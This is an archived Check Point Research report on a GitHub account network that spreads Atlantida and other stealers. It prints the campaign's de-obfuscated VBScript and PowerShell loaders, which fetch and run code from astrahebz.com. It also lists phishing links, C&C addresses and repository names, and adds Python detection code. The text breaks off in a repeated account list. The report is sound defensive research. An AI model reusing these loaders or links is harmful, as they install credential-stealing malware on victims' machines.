{
	"id": "907c9678-67ef-48cb-8165-53453862a36d",
	"created_at": "2026-04-06T00:13:33.101593Z",
	"updated_at": "2026-04-10T03:37:33.268619Z",
	"deleted_at": null,
	"sha1_hash": "9360ea522e191d1c65670d2245d2d928b6b2c123",
	"title": "Stargazers Ghost Network - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 244514,
	"plain_text": "Stargazers Ghost Network - Check Point Research\r\nBy antoniost@checkpoint.com\r\nPublished: 2024-07-24 · Archived: 2026-04-05 14:47:05 UTC\r\nResearch by: Antonis Terefos (@Tera0017)\r\nKey Points\r\nCheck Point Research identified a network of GitHub accounts (Stargazers Ghost Network) that distribute\r\nmalware or malicious links via phishing repositories. The network consists of multiple accounts that distribute\r\nmalicious links and malware and perform other actions such as starring, forking, and subscribing to malicious\r\nrepositories to make them appear legitimate.\r\nThis network is a highly sophisticated operation that acts as a Distribution as a Service (DaaS). It allows threat\r\nactors to share malicious links or malware for distribution through highly victim-oriented phishing repositories.\r\nCheck Point Research is tracking the threat group behind this service as Stargazer Goblin. The group provides,\r\noperates, and maintains the Stargazers Ghost Network and distributes malware and links via their GitHub Ghost\r\naccounts.\r\nThe network distributed all sorts of malware families, including Atlantida Stealer, Rhadamanthys, RisePro,\r\nLumma Stealer, and RedLine.\r\nOur latest calculations suggest that more than 3,000 active Ghost accounts are part of the network. Based on core\r\nGitHub Ghost accounts, we believe that the network began development or testing on a smaller scale for the first\r\ntime around August 2022.\r\nCheck Point Research discovered an advertiser in Dark-Web forums that provides the exact GitHub operation. The\r\nfirst advertisement was published on July 8, 2023, from an account created the previous day.\r\nBased on the monitored campaigns from mid-May to mid-June 2024, we estimate that Stargazer Goblin earned\r\napproximately $8,000. However, we believe that this amount is only a small fraction of what the actor made during\r\nthat period. 
The total amount during the operations’ lifespan is estimated to be approximately $100,000.\r\nStargazers Ghost Network appears to be only one part of the grand picture, with other Ghost accounts operating on\r\ndifferent platforms, constructing an even bigger Distribution as a Service universe.\r\nIntroduction\r\nThreat actors continually evolve their tactics to stay ahead of detection. Traditional methods of malware distribution via\r\nemails containing malicious attachments are heavily monitored, and the general public has become more aware of these\r\ntactics. Recently, Check Point Research observed threat actors using GitHub to achieve initial infections by utilizing new\r\nmethods. Previously, GitHub was used to distribute malicious software directly, with a malicious script downloading either\r\nraw encrypted scripting code or malicious executables.\r\nTheir tactics have now changed and evolved. Threat actors now operate a network of “Ghost” accounts that distribute\r\nmalware via malicious links on their repositories and encrypted archives as releases. This network not only distributes\r\nmalware but also provides various other activities that make these “Ghost” accounts appear as normal users, lending fake\r\nlegitimacy to their actions and the associated repositories. Check Point Research has observed these accounts forking,\r\nstarring, and watching malicious repositories, creating the illusion of a legitimate project and luring victims into\r\ndownloading the “advertised” content.\r\nhttps://research.checkpoint.com/2024/stargazers-ghost-network/\r\nPage 1 of 45\n\nIn a short period of monitoring, we discovered more than 2,200 malicious repositories where “Ghost” activities were\r\noccurring. During a campaign that took place around January 2024, the network distributed Atlantida stealer, a new\r\nmalware family that steals user credentials and cryptocurrency wallets along with other personal identifiable information\r\n(PII). 
This campaign was highly effective: in less than 4 days, more than 1,300 victims were infected with Atlantida stealer. The malicious links to the GitHub repositories were possibly distributed via Discord channels. The repositories targeted various types of victims who wanted to increase their followers on YouTube, Twitch, and Instagram, and also contained phishing templates for cracked software and other crypto-related activities.\r\nFigure 1 – Stargazer Ghost account.\r\nStargazers Ghost Network\r\nFor quite some time, GitHub has been utilized as a platform to distribute malicious code. Typically, repositories involved in such activities are newly created for specific campaigns and often stay online for long periods of time before being taken down by GitHub or cleaned up by the threat actors. However, the content within these repositories usually does not suggest to a normal user that they should download and execute any of the hosted scripts or executables.\r\nThese types of attacks do not aim to lure users into directly downloading and executing payloads from the repository itself. Instead, they often involve scripts that download and execute payloads from seemingly legitimate websites or sources. This approach helps maintain the appearance of legitimacy while delivering malicious content to victims.\r\nThe Stargazers Ghost Network changes the game by providing a malicious repository where a malicious link is “starred” and “verified” by multiple GitHub accounts, thereby supporting its legitimacy.\r\nFigure 2 – Malicious GitHub account luring Twitch users.\r\nOften, the network utilizes identical tags and images but switches the “targeted audience” from one social media application or cracked software to another, employing the same template. 
This suggests that the network operators automate these activities, ensuring efficiency and scalability in their operations.\r\nFigure 3 – TikTok, YouTube, Twitch, Instagram, … with the same phishing template.\r\nThe README.md phishing template contains a malicious DOWNLOAD link to an external website. In some instances, this link redirects victims to the Releases section of a malicious GitHub repository instead. GitHub usually tries to detect malicious files or archives, but in many cases the network uses password-protected archives, which scanning solutions cannot open and therefore cannot inspect.\r\nFigure 4 – Malware is distributed via password-encrypted archive releases.\r\nIn this scenario, the README.md contains a phishing download link that does not even redirect to the repository’s own releases. Instead, it uses three GitHub Ghost accounts with different “responsibilities”:\r\n1. The first account serves the “phishing” repository template.\r\n2. The second account provides the “image” used for the phishing template.\r\n3. The third account serves malware as a password-protected archive in a Release.\r\nThis structure and operational method enable Stargazer Goblin to quickly “fix” any broken links that occur when accounts or repositories are banned for malicious activities. By distributing responsibilities across multiple accounts, the network ensures flexibility in replacing its compromised components. This minimizes disruption to their operations, allowing them to swiftly adapt and continue their malicious activities on GitHub.\r\nThe third account, which serves the malware, is the most likely to be detected. When this happens, GitHub bans the entire account, repository, and associated releases. In response, Stargazer Goblin updates the first account’s phishing repository with a new link to a new, active malicious release. 
This allows the network to continue operating with minimal losses when a malware-serving account is banned.\r\nREADME.md content:\r\n# [Download](hxxps://github.com/soulkeeper500/soulkeeper500/releases/tag/lat)\r\n![trovos](hxxps://github.com/Minori702/Trovo-Toolkit/assets/154011813/98f626f2-0e25-4379-8902-801bd93892aa)\r\n### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The software product is designed to help promote content for both individual users and organizations looking to expand their online influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions.\r\n**Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may result in account lockout.\r\n## Features\r\n- Live viewers\r\n- Trovo Account creator\r\n- Chat bot\r\n- Follow bot\r\n- Shares\r\n- Mass report\r\n- Support for multiple accounts to create organic traffic\r\n- Customize time intervals between \"views\" to simulate a real user\r\n- Simple and easy-to-use user interface\r\n- Support for proxy servers for anonymity and security\r\n## Technologies\r\n- C programming language\r\n- Work with social networks API\r\n- Proxy and anonymity of network requests\r\n- Web scraping and browser automation\r\nTo an experienced eye, these repositories look suspicious. What tipped us off was the high number of “stars” received by each one of those repositories. 
Further investigation revealed that the accounts responsible for starring/“liking” these malicious repositories are integral to the same operation.\r\nFigure 6 – Stargazers of the malicious repository.\r\nWe observed a pattern across many of those Stargazer Ghost accounts: each contains a repository with these characteristics:\r\n1. Repository name {username}1.\r\n2. Two files: the LICENSE of the project and the README.md.\r\nThe README.md title is the account name followed by “1”, and its body is the single line “1”.\r\nRepository: {username}1, README.md content: # {username}1\\n1\r\nFigure 7 – GitHub Ghost accounts repository pattern.\r\nWhen we searched for that specific pattern, we discovered more than 1,100 repositories, which suggests that more than 1,100 Ghost GitHub accounts are part of this malicious Stargazers network.\r\nFigure 8 – README.md content pattern.\r\nEach Ghost Stargazer within the Stargazers network is not limited to interacting with just one repository. 
Many of these accounts engage with multiple repositories, a significant portion of which are clearly involved in malicious activities. Some of the other starred repositories appear just as suspicious, such as WordPress-related and gaming-mod tools.\r\nFigure 9 – Ghost account starred repositories.\r\nBased on the wide variety of projects and “interests” of those Ghost Stargazers, ranging from playing Counter-Strike to Instagram influencers to hacking and protecting machines with cracked anti-virus software, we were able to discover additional malicious templates and further expand our collection of Ghost Stargazer accounts.\r\nFigure 10 – Game Cheat Repository.\r\nWhen malicious links redirect to GitHub releases, we have observed instances where associated accounts react to (“like”) these malicious releases. This behavior further reinforces the projects’ perceived “legitimacy” for unsuspecting users.\r\nFigure 11 – Release reactions.\r\nThe accounts and their actions are separated even further: we discovered cases where other accounts that are also part of this network made the commits to the malicious phishing README.md files.\r\nFigure 12 – Commit to another account’s project.\r\nIt is not clear whether all those accounts were created by Stargazer Goblin for malicious purposes. As our research later suggests, some of those accounts are compromised. This makes GitHub credentials obtained by infostealers valuable, and indeed valuable enough to be sold and bought on underground markets.\r\n“Takedowns” \u0026 “Maintenance” Cycle\r\nThe multiple, distinct roles make network maintenance easy, as GitHub will not take down all accounts related to the repository distributing the malware. 
This leaves the accounts below free to continue their operations with minimal “damage” when action is taken against the repository hosting the malware:\r\n1. Repository-Phishing accounts.\r\n2. Commit-Link accounts.\r\n3. Stargazer accounts.\r\n4. Any other accounts.\r\nThe repository buttercupserial/HubSpot-activation-by-nuat has been active since 2024-05-28 and has undergone 6 link changes. These 6 commits were made by buttercupserial (168463497+buttercupserial@users.noreply.github.com), maintaining the attack chain by updating the malware links.\r\nFigure 13 – Maintenance commits.\r\nCommit Date | Malware URL\r\n2024-05-28T10:21:50Z | hxxps://github[.]com/bludmooncutie2/bludmooncutie2/releases/tag/latest\r\n2024-05-29T07:35:32Z | hxxps://github[.]com/witch12138/test/releases/tag/lat\r\n2024-06-04T06:51:50Z | hxxps://github[.]com/soulkeeper500/soulkeeper500/releases/tag/lat\r\n2024-06-06T07:40:15Z | hxxps://github[.]com/xumuk71discoatoh/xumuk71discoatoh/releases/tag/new\r\n2024-06-10T02:09:27Z | hxxps://goo[.]su/gisof1sda –\u003e hxxps://github[.]com/zigzagcharming643/zigzagcharming643/releases/tag/lat\r\n2024-06-10T09:13:52Z | hxxps://github[.]com/xumuk71discoatoh/xumuk71discoatoh/releases/tag/new\r\nThe commits modify only the download link, keeping the remainder of the phishing template intact. 
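Both patterns described above, the {username}1 marker repository and the Commit account that swaps nothing but the download link, can be checked mechanically. The Python below is an added example written for this page, not Check Point’s tooling: it works on repository metadata and README revisions that are assumed to have been fetched already (here constructed inline; the revision URLs are the ones from the table above), flags marker repositories, and lists the maintenance commits in a README history. The account name ghostuser, the fourth revision and the simplified template are illustrative assumptions.

```python
# Added example (not Check Point code): two checks derived from the observations above.
# 1. Stargazer marker repository: named {username}1, holding only LICENSE and README.md,
#    where the README is exactly the title '# {username}1' followed by the line '1'.
# 2. Commit-account maintenance: successive README.md revisions that differ only in the
#    Download URL while the rest of the phishing template stays intact.
# All repository metadata and README revisions below are constructed for the demonstration.


def is_marker_repo(owner, repo_name, file_names, readme):
    # Exactly the two files and the two-line README the Ghost accounts were seen to carry.
    if repo_name != owner + '1':
        return False
    if sorted(file_names) != ['LICENSE', 'README.md']:
        return False
    lines = [ln.strip() for ln in readme.strip().splitlines()]
    return lines == ['# ' + owner + '1', '1']


def markdown_links(text):
    # Return (label, url) for every [label](url) link; ![alt](url) image embeds are skipped.
    out = []
    pos = 0
    while True:
        close = text.find('](', pos)
        if close == -1:
            return out
        depth = 0
        open_idx = -1
        for j in range(close - 1, -1, -1):  # walk back to the bracket opening this label
            if text[j] == ']':
                depth += 1
            elif text[j] == '[':
                if depth == 0:
                    open_idx = j
                    break
                depth -= 1
        end = text.find(')', close + 2)
        if open_idx == -1 or end == -1:
            return out
        if not (open_idx > 0 and text[open_idx - 1] == '!'):
            out.append((text[open_idx + 1:close], text[close + 2:end]))
        pos = end + 1


def download_url(readme):
    # The phishing template puts the payload behind a link labelled Download (any case).
    for label, url in markdown_links(readme):
        if label.strip().lower() == 'download':
            return url
    return None


def link_only_change(old_readme, new_readme):
    # True when two revisions differ solely in the Download URL: the maintenance commit,
    # where a banned release link is swapped for a live one and nothing else moves.
    old_url, new_url = download_url(old_readme), download_url(new_readme)
    if old_url is None or new_url is None or old_url == new_url:
        return False
    return old_readme.replace(old_url, '{url}') == new_readme.replace(new_url, '{url}')


def link_history(revisions):
    # revisions: chronological list of (commit_timestamp, readme_text).
    # Returns one (timestamp, old_url, new_url) per maintenance commit.
    return [(t1, download_url(r0), download_url(r1))
            for (t0, r0), (t1, r1) in zip(revisions, revisions[1:])
            if link_only_change(r0, r1)]


# Constructed marker repository README for an assumed account named 'ghostuser'.
MARKER_README = '''# ghostuser1
1
'''

# Constructed, shortened phishing template; the image URL is the one quoted in the report.
TEMPLATE = '''# [Download]({url})
![trovos](hxxps://github.com/Minori702/Trovo-Toolkit/assets/154011813/98f626f2-0e25-4379-8902-801bd93892aa)
### ViewBot is a tool designed to increase views and engagement on social platforms.
- Support for proxy servers for anonymity and security
'''

# Revision history modelled on the first three commits in the table above, plus a constructed
# fourth revision that edits the text but keeps the link (so it is not a maintenance commit).
SAMPLE_REVISIONS = [
    ('2024-05-28T10:21:50Z', TEMPLATE.format(url='hxxps://github[.]com/bludmooncutie2/bludmooncutie2/releases/tag/latest')),
    ('2024-05-29T07:35:32Z', TEMPLATE.format(url='hxxps://github[.]com/witch12138/test/releases/tag/lat')),
    ('2024-06-04T06:51:50Z', TEMPLATE.format(url='hxxps://github[.]com/soulkeeper500/soulkeeper500/releases/tag/lat')),
    ('2024-06-05T00:00:00Z', TEMPLATE.format(url='hxxps://github[.]com/soulkeeper500/soulkeeper500/releases/tag/lat').replace('ViewBot', 'ViewBot Pro')),
]

if __name__ == '__main__':
    print(is_marker_repo('ghostuser', 'ghostuser1', ['LICENSE', 'README.md'], MARKER_README))
    for change in link_history(SAMPLE_REVISIONS):
        print(change)
```

In practice the inputs come from the GitHub API (repository contents and the commit history of README.md); a repository that passes is_marker_repo, or whose README history consists of nothing but link swaps, is worth treating as part of such a network rather than as an ordinary project.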
\r\nFigure 14 – Link change.\r\nThe latest link directs to a release featuring the password-protected archive Git_softwares_v1.1.2.7z, which contains a Go downloader, Setup_v1.1.2.exe (SHA256: 98B7488B1A18CB0C5E360C06F0C94D19A5230B7B15D0616856354FB64929B388).\r\nFigure 15 – Password-protected release.\r\nThe network’s maintenance and recovery process appears to be automatic, detecting banned accounts/repositories and fixing them when necessary. Using different account roles ensures there is only minimal damage when and if GitHub takes action against accounts or repositories that violated its rules.\r\nFigure 16 – Stargazers Ghost Network Roles Overview.\r\nMost of the time, we observe that Repository and Stargazer accounts remain unaffected by bans and repository takedowns, whereas Commit and Release accounts are typically banned once their malicious repositories are detected. It is common to find Link-Repositories containing links to banned Release-Repositories. When this occurs, the Commit account associated with the Link-Repository updates the malicious link with a new one.\r\nThe Commit account maintains a one-to-one relationship with all repositories under the Repository account. 
This means the same Commit account can make multiple commits to repositories that belong to the same Repository account.\r\nFor typical campaigns, we usually observe the following requirements:\r\nOne Repository account, which owns the phishing repository hosting the download link.\r\nOne Commit account, which makes commits to the repositories belonging to the Repository account.\r\nOne Release account, which creates and adds a malicious archive to a repository’s release and updates the archive daily to stay undetected for longer.\r\nX Stargazer accounts, which fork/star/like the repositories and releases.\r\nIn the above scenario, the Release account is usually the first to be banned. The network operator then creates a new malicious link and updates all the Link Repositories through the related Commit accounts. In conclusion, 2 accounts (Repository/Commit) plus X Stargazers remain under the radar, while 1 Release account will possibly be banned at some future point. In this way the network roles manage to “bypass” GitHub’s security measures.\r\nCampaign I, Stargazers Ghost Network – Atlantida Stealer\r\nCheck Point Research analyzed a specific case in detail, revealing a GitHub campaign that resulted in Atlantida stealer. The malicious GitHub link was possibly distributed via Discord, targeting Twitch users. The attack chain utilized malicious scripts hosted on compromised WordPress websites, making us wonder whether the suspicious GitHub repositories with code for WordPress sites could also play a role.\r\nFigure 17 – Attack Chain Overview.\r\nThe victim receives a link to a GitHub phishing repository and clicks on the malicious download link, which directs them to download a script from a WordPress website. 
The contacted PHP file, index.php, checks the Referer header of the HTTP request to verify that the victim came from GitHub, and checks whether the client IP address belongs to the TOR network or is otherwise blacklisted. Only requests that pass this validation are redirected to download.php, so fetching the link directly, without a GitHub Referer or through TOR, is unlikely to return the payload.\r\nREADME.md content:\r\n## [DOWNLOAD](hxxps://carson.org.uk/gg1/index.php)\r\n![window](hXXps://github.com/arbipad/creator/assets/155444726/cf2bf4e1-650b-4bc4-b444-ae164efaa0f3)\r\n### ViewBot is a tool designed to increase views and engagement on social platforms through an automated system. The software product is designed to help promote content for both individual users and organizations looking to expand their online influence. ViewBot utilizes modern social media API techniques to provide native and natural looking interactions.\r\n**Warning**: The use of bots to artificially boost social media statistics may be against the terms of use of the respective platforms and may result in account lockout.\r\n## Features\r\n- Automate page/video views on popular social platforms\r\n- Support for multiple accounts to create organic traffic\r\n- Customize time intervals between \"views\" to simulate a real user\r\n- Functionality to enhance interaction with content (likes, comments, subscriptions)\r\n- Simple and easy-to-use user interface\r\n- Support for proxy servers for anonymity and security\r\n## Technologies\r\n- Python programming language\r\n- Work with social networks API\r\n- Proxy and anonymity of network requests\r\n- Web scraping and browser automation\r\n## License\r\n[![License](hxxps://img.shields.io/badge/License-MIT-green)](LICENSE)\r\nThe downloaded file is an .HTA file named Impress_V1.0.2.hta. It contains a malicious iframe whose link, hxxp://astrahebz.com/te/g.mhtml, executes the VB script code; the remainder of the HTA is decoy HTML (navigation links such as “Skip to main content”, “About” and “Public questions \u0026 answers”).\r\nThe VB script contains obfuscated code that executes PowerShell, which in turn runs remote code from another WordPress website.\r\nThe de-obfuscated VB code:\r\n\u003cscript language=\"vBsCrIpT\"\u003e\r\nSet tired52 = GetObject('winmgmts:\\\\.\\root\\cimv2')\r\nSet shell29 = tired52.Get('Win32_Process')\r\nintReturn = shell29.Create('powershell irm hxxp://astrahebz.com/te/useless.txt | iex', Null, Null, intProcessID)\r\n\u003c/script\u003e\r\nThe process is created through WMI (Win32_Process.Create) rather than WScript.Shell, so the PowerShell process is started by the WMI provider host and not as a child of mshta.exe.\r\nPowerShell code executing a .NET injector:\r\n$crop213 = @'\r\n[DllImport(\"kernel32.dll\")]\r\npublic static extern IntPtr GetConsoleWindow();\r\n[DllImport(\"user32.dll\")]\r\npublic static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);\r\n'@\r\nAdd-Type -MemberDefinition $crop213 -Namespace \"crumble542543\" -Name \"culture6546\"\r\n$danger5646 = [crumble542543.culture6546]::GetConsoleWindow()\r\n[crumble542543.culture6546]::ShowWindow($danger5646, 0)\r\n[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData(\"hxxps://astrahebz.com/te/tetete.bin\")).EntryPoint.Invoke($null, @($null))\r\nThe script first hides its own console window (ShowWindow with nCmdShow 0, SW_HIDE), then downloads the .NET assembly tetete.bin into memory, loads it with Assembly.Load and invokes its entry point, so nothing is written to disk at this stage.\r\nThis .NET injector creates a regasm.exe process and injects shellcode into it. The final payload is Atlantida stealer, with C\u0026C at 185.172.128.95. The stealer’s network communication is unencrypted plain text. 
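Process-creation telemetry is the natural place to catch this chain. The Python below is an added example for this page, not Check Point’s or the malware author’s code: it runs a few rules over constructed Sysmon-style process events (fields Image, ParentImage, CommandLine and ProcessId; the process IDs and paths are made up) modelled on the steps above: mshta.exe opening an .hta from a Downloads folder, a PowerShell download cradle of the irm ... | iex form, and regasm.exe started by PowerShell. One caveat the example encodes: because the VBScript creates PowerShell through WMI’s Win32_Process.Create, the parent of powershell.exe is WmiPrvSE.exe rather than mshta.exe, so a rule that only looks for mshta.exe spawning PowerShell misses this sample.

```python
# Added example (not code from the report or the malware): detection rules over
# constructed Sysmon-style process-creation events modelled on the Atlantida chain above.

SEP = chr(92)  # a single backslash, used to build Windows paths


def winpath(*parts):
    # Join path components with backslashes, e.g. winpath('C:', 'Windows', 'System32').
    return SEP.join(parts)


def basename(path):
    # Lower-cased file name of a Windows or POSIX path.
    return path.replace(SEP, '/').rsplit('/', 1)[-1].lower()


def is_download_cradle(cmdline):
    # PowerShell one-liners that fetch remote content and pipe it straight into execution,
    # such as 'powershell irm hxxp://host/x.txt | iex' from the de-obfuscated VBScript.
    c = ' '.join(cmdline.lower().split())
    fetch = any(t in c for t in ('irm ', 'iwr ', 'invoke-restmethod', 'invoke-webrequest',
                                 'downloadstring(', 'downloaddata('))
    execute = any(t in c for t in ('| iex', '|iex', 'invoke-expression', '.entrypoint.invoke'))
    remote = any(t in c for t in ('http://', 'https://', 'hxxp://', 'hxxps://'))
    return fetch and execute and remote


SHELLS = ('powershell.exe', 'pwsh.exe', 'cmd.exe')


def classify(event):
    # Return the names of every rule that matches one process-creation event.
    hits = []
    image = basename(event['Image'])
    parent = basename(event['ParentImage'])
    cmd = event.get('CommandLine', '')
    low = cmd.lower()
    if image == 'mshta.exe' and '.hta' in low and 'downloads' in low:
        hits.append('mshta_hta_from_downloads')
    if image in SHELLS and is_download_cradle(cmd):
        hits.append('powershell_download_cradle')
    if image in SHELLS and parent == 'wmiprvse.exe':
        # Win32_Process.Create runs inside the WMI provider host, so WmiPrvSE.exe, not
        # mshta.exe, is the parent: a mshta -> powershell parent/child rule never fires here.
        hits.append('wmi_spawned_shell')
    if image == 'regasm.exe' and parent in SHELLS:
        # The .NET injector launches regasm.exe as the host for its shellcode.
        hits.append('regasm_from_powershell')
    return hits


def detect(events):
    # Flatten to (ProcessId, rule) pairs for reporting and assertion.
    return [(e['ProcessId'], rule) for e in events for rule in classify(e)]


SYS32 = winpath('C:', 'Windows', 'System32')
PS = winpath(SYS32, 'WindowsPowerShell', 'v1.0', 'powershell.exe')
HTA = winpath('C:', 'Users', 'victim', 'Downloads', 'Impress_V1.0.2.hta')

# Constructed sample events, in the order the chain would produce them.
SAMPLE_EVENTS = [
    {'ProcessId': '4120', 'Image': winpath(SYS32, 'mshta.exe'),
     'ParentImage': winpath('C:', 'Windows', 'explorer.exe'),
     'CommandLine': 'mshta.exe ' + HTA},
    {'ProcessId': '4188', 'Image': PS,
     'ParentImage': winpath(SYS32, 'wbem', 'WmiPrvSE.exe'),
     'CommandLine': 'powershell irm hxxp://astrahebz.com/te/useless.txt | iex'},
    {'ProcessId': '4212',
     'Image': winpath('C:', 'Windows', 'Microsoft.NET', 'Framework64', 'v4.0.30319', 'RegAsm.exe'),
     'ParentImage': PS, 'CommandLine': 'RegAsm.exe'},
    # Benign administrator activity, which must not match any rule.
    {'ProcessId': '4300', 'Image': PS,
     'ParentImage': winpath('C:', 'Windows', 'explorer.exe'),
     'CommandLine': 'powershell Get-Process'},
]

if __name__ == '__main__':
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```

The cradle rule is deliberately content-based (fetch verb, execute verb, remote URL) rather than keyed on a single domain, since the WordPress hosts in this campaign are compromised sites that change; the WmiPrvSE.exe rule is the one that makes this particular HTA chain visible at all.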
The first connection sends IP information to 185.172.128.95:6666, and the next sends to 185.172.128.95:6665 an archive with the stolen information: Screenshot.jpeg, User Infromation.txt, Geo Information.txt, BrowserInfo.txt and, for each browser, the Cookies/History/…\r\nFigure 20 – Bot’s first request.\r\nFigure 21 – Bot’s second request.\r\nThis campaign appears to have targeted victims who wanted to increase their “followers audience” on Twitch, Instagram, YouTube, Twitter, Trovo, and TikTok, or to use other tool-related features for Kick Chat, Telegram, Email, and Discord. Some of the malicious repositories distributing this template and phishing link were:\r\narmoly/Discord-Bot\r\narmoly/Ds-Spm\r\narmoly/Email-Spm\r\narmoly/Tg-Spm\r\narmoly/Tg-SpmTg-Spm\r\narmoly/Twt-Spm\r\nbleblquck/FT-Vieww\r\nbleblquck/Kck-Vw\r\nbleblquck/Trv-Vws\r\nbleblquck/Tw-Vws\r\ndscvm/Discord-Vbot\r\ndscvm/Visoul-Grabber\r\nglassmuysa/Htlx-Gen-Check\r\nglassmuysa/Mail-Ac-Gen\r\nglassmuysa/TwT-Genr\r\nglassmuysa/Ytb-Dwnld\r\ngooles54/Rison-Raid-Bot\r\ngooles54/Rison-Trading-Bot\r\ngooles54/WPscn\r\nlzero121/TWT-vWS\r\nlzero121/Ytb-Vws\r\nlzero121/iNS-vWS\r\nlzero121/tK-vWS\r\nmemekch/TWT-vWS\r\nmemekch/Ytb-Vws\r\nmemekch/iNS-vWS\r\nmemekch/tK-vWS\r\nmemo1l/ChatGpt-Turbo\r\nsokratso/KMSpic-Ac\r\nvaliso0/Mail-Ac-Generator\r\nvaliso0/TwT-Gen\r\nvaliso0/Ytb-Dwnld\r\nAt the same time, more than 380 Stargazer Ghost accounts starred the ~30 repositories listed:\r\n0SPEED, 1shadowed, 2011mehdi, 60go, 7qwertyz, 9599853506, AUGUSCO, Ahmad7Salah, Akshitdangwal, Alexaldi, Alpha9310, AmirChidan9, AngelFx777, Aniketgamingx, ArsanyAbdalla, Aubskobbes5, Azang123, Badno2055, Bahaabasuny0, Bazarasxx, BilalPasta, Boki309, BreakDee, BrokyBroke, Byronjr1, CanyonsEcho, Castle135798, Ch4r0oN, Chhunly844, Client, CoderXL, Coding, Cortjiani, D4RK4T, DSB1973, Danish24123, DavidGruz, Detroit16, Drakanobr, Emaynike, EneerOP, Ericshalbe, Felixcyniiy, ForlornWindow46, Fox, Fox-King777, FranciscoFerreiraMaciel, GEOMETRYDASHGOD2010, GEOXKEVINO, GabrielFel, GabrielHorbach, Gabst7, Gaplaster3600, Ghadir450, Git, Gokumase, Gonachapa, GurujiIsLive, Hassanjanjua, Haxrusxx, Housamelsherif, HuzaifaOmar, I1900sn, ImadOmer, Irsyan12, ItzzSzymusss, Ivrou66, Jamaldoskiy, Jaouadrobio, Jasonnoi, Jayko235, Jayxxx14, Jessy55491, JhonataLim, Jockymaxi, JonathanLaraAguirre, Jtayyab007, KaizerEmre, KenderMendoza2, Kets357, Kimi-, Kimi-Hsueh, Kle182, Kroz157, Krutik03, Kynarox, LAKAKKK, LEVITA44, Leandro1242, LeandroMirante, Lebagordo, LeoBello00, Lyonnais, Lyonnais-2008, M-Asghar8atk, MHCYT, Madulahstaxks, MahmoudRede, Malek50, Mallco14, Marco22gt, Marcoscpires, Masud99Rana, MemeiNako, MenowJP, Miguelnogame, MohamedFayek2024, 
Mudjator, MuhammadBayuPriyatna, MuhammadRamzan123, Mustangth666, Nannydream, Nealhag, Neivolan, NexoCreeper, Nikolas145, Nitanzw, NobiKazi, Oeslen, OrucMuhammed, OscarSalas19, Oscardoh63, Pantyshop, PasaBrava, Paul, Paul-CACHERA, Pedro42600, PlarixTools, PsandQs, ROBOT2207, Rajveer8169, RefiElisa, Richard-Petty-Cru, RikuAAAAA, Riles923, RimuruNeto, RolandSandorNagy, RoyalLegend0304, Ruhan44, SaidDEV89, SaidSetup, SalmonButterzz, SatakeReal, Sebocha18, Severete, Sinbaiezechiel, SirRafael, Sourovnag, StrikerJapa, SusannBaldiviezo, Syedhamzaalishah, SzaSza2, TUNA-V, Technogun92, Thanakys, ThawHtooZin, ThiagoSilva97, Tomasdionisio, TulioInnoveSistema, Tumladen, Umair-Younus-1152, Urashtu, UsmanKhursheed06, Vavarea, Vickysris, Victor, VilaxDev00, Voracxty, WILWAP, Wanmeng811, Warungkakek, WeFacaa, Winzume, YakultGo, Yinyang26, Yokeshraj2001, Youssef, Zecuss, Zekoahmed, Zounzxx, a1nz0, aabdelhaleemm, absolutelie, achieversm, adixillua, advaman, alexplaysminecraft, aliii00, aminov1010, anaskhan785, anasskeda, aninha1kstro, asayahandatgr, asdasfazamazsdgfdsg, asdssfsd, asliyiilmaz, asmuiahmad, atoras34, axeldolce0x, bgpx28, bleblquck, bodrumblock, brayan7897, brookandels, c0mroy, chatchai2165, dadinhokkk, dblancolascarez, deepak, deepak-gurjar07, deseplikon, dikiprsty, dnomesh, ecoplayer07, egoistpanel, elMarkoDev, epsilon201, f4h3m, fanerso, fatemehsotudeh, foxboyyyyyyy, gdois, georgi1122, guy1a2, hamudi1122, hereisue, hnghvfhcggf6699, hugotpdev, imazen59, imbored112, ismailsawadi, issabii, jahanzaibranaa1, jeremix14, jetunpatel1376, katarinadewi01, kb2030, khaledbenz2009, khanbhijan, khk6644, kitrock25, knowledgecase, kubisshi, kumar7679, kumarthar, kurosh, kxzpreto, larryewakins, lawadas1231, lenegropu, lilmaku, llkkaaaslk, lokmanbaz, lucasmatheusdasilvadarosa, lucasodiniz, lucasstarley, 
lukeomatik,\r\nlyyzwjj, lzero121, m1a5g24, mady0602, mahlatsita, mailnhucac, malhotraraghav2003, malrazer, mansourazim,\r\nmarcosibottino, mariamlola, mateuscarestiato, mayilvaganam, medo659, memo20101, mertahxo, mgred22, milklove60122,\r\nmisterclima, mjsal,\r\nmohamednaeem109, monishgoal, motiaaa2, mougouta1, mrsinner56, mtalha7262, nachoooopxd, nadir0125, nathan,\r\nnendousbae, newbieRizal, nguyenthanhthuy140403, nikko6433, ninexslow, ninjas007, nizzamgrty, nomeshhost,\r\nnoobking1234, noobking1234,, notayessir,\r\nnotglwze, nunur66, oPaozinh0, oicu8lsd, openmare, pao2522, passcard2A, patadoeman222, phuriphatthongkuea,\r\npierre930523, potatoaim1313, prasanta1515, qaisar1234890, quavofinnest, rakuyoMo, ramdoni, ratihpurnamasar, raul2341,\r\nrazzm7, rbxrecoveryexploits,\r\nrcrobcarlos, rdiaz-002, reekid84, revelicate, reynaldirey18, richiewrld, rico260104, ricogann, riendlek, riftal12, riocdr,\r\nrtR4RWp, rudy172, rxcw777, saadanjaved, saintxzx, saivaibhavtamiri, samiranf, sarathi, sejgseok,\r\nsepqy, sha0urya, sisjosex, sowjanyabhat, squidy24, sujay1599, tajokshare2023, tamsirdiarra4, teejw, thedani1122,\r\ntherotmaxxer, titiobig, tjwpo, tonyOsama1546, trev2coldfrr, tvixterSourceCode, txxzclew, ugyen27, ultralinksgh,\r\nvault797478,\r\nvictid, wa314444, watcharaponnar, webdevuacs, wildan324, williamvidal87, xinghe99, xitadinhoss, yiosoimortal, yokamm,\r\nyoosef30, yourscloudyy, yuong22, z8lc, z8lc60go, zaayaz, zefgzeragze, zuhdi, zuhdi-in\r\n0SPEED, 1shadowed, 2011mehdi, 60go, 7qwertyz, 9599853506, AUGUSCO, Ahmad7Salah, Akshitdangwal, Alexaldi,\r\nAlpha9310, AmirChidan9, AngelFx777, 